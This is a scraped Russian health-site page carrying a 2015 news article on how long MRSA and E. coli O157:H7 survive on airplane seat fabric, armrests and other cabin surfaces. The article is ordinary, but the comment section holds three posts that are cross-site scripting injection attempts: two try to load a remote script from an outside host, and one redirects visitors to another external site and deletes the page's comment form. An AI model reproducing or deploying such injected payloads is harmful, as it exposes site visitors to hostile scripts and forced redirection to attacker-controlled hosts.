Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Микробы в самолетах могут...  >>  Микробы в самолетах могут жить неделями! А сколько проживете вы после этой встречи?
 
Обратная связь
 

Микробы в самолетах могут жить неделями! А сколько проживете вы после этой встречи?

Размер шрифта
24 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, самолеты не так уж безопасны: находясь в них, вы запросто можете заболеть. Ученые выяснили, что болезнетворные бактерии выживают внутри самолета в течение нескольких дней и даже недель и могут служить источниками инфекции.

Микробы в самолетах могут жить неделями! А сколько проживете вы после этой встречи?

Ученые провели эксперимент, чтобы выяснить, как долго бактерии могут жить на различных поверхностях внутри самолета. Они выбрали два типа бактерий: это метициллин-резистентный золотистый стафилококк и E. coli O157:H7. В своем эксперименте они проанализировали шесть различных материалов, которые можно найти в любом самолете: подлокотники, пластиковые столешницы, металлические ручки от слива в туалете, жалюзи, ткань и кожу с пассажирских сидений. На каждом из этих предметов они разместили бактерий и создали вокруг них условия, соответствующие условиям внутри обычного авиалайнера. Золотистый стафилококк дольше всего сохранялся на ткани пассажирских кресел (168 часов), в то время как E. coli – на подлокотниках (96 часов). Результаты этого эксперимента были представлены на заседании Американского общества микробиологов в Бостоне.

«Многие люди обеспокоены тем, что при путешествии на самолете существует риск подхватить инфекцию от других пассажиров», – рассказывает автор работы доктор Кирилл Вагленов из Университета Аубурна. «Этот эксперимент – наш первый шаг в исследовании этого вопроса».

«Наши данные говорят о том, что оба типа бактерий могут жить внутри самолета в течение нескольких дней. Это значит, что у пассажиров есть шанс заразиться через прямой контакт кожи с инфицированными поверхностями», – объясняет Вагленов. «Мы намереваемся разработать новые эффективные методики очистки и дезинфекции салонов авиалайнеров. Также сейчас мы тестируем различные материалы, которые обладают собственной противомикробной активностью. Все это поможет уменьшить риск инфицирования пассажиров», – добавляет он.

Однако не стоит отказываться от путешествий на самолетах из-за боязни заразиться, ведь риск подхватить инфекцию довольно низок. К тому же вы можете легко обезопасить себя, соблюдая простые правила личной гигиены: пейте воду, мойте руки антисептическим гелем.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:13

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Одна привычка, которая делает вас больным   Собрались в отпуск? В этих странах вы обязательно заболеете!   Можно ли сэкономить на воде и не ходить в душ?   Как не стать жертвой голубей-убийц?!  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
5 мест, где вы точно подцепите простуду!
Как действительно избавиться от всех микробов. Часть 1
Можно ли вылечить грибок без врача?

Тесты

1
Средства личной гигиены
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.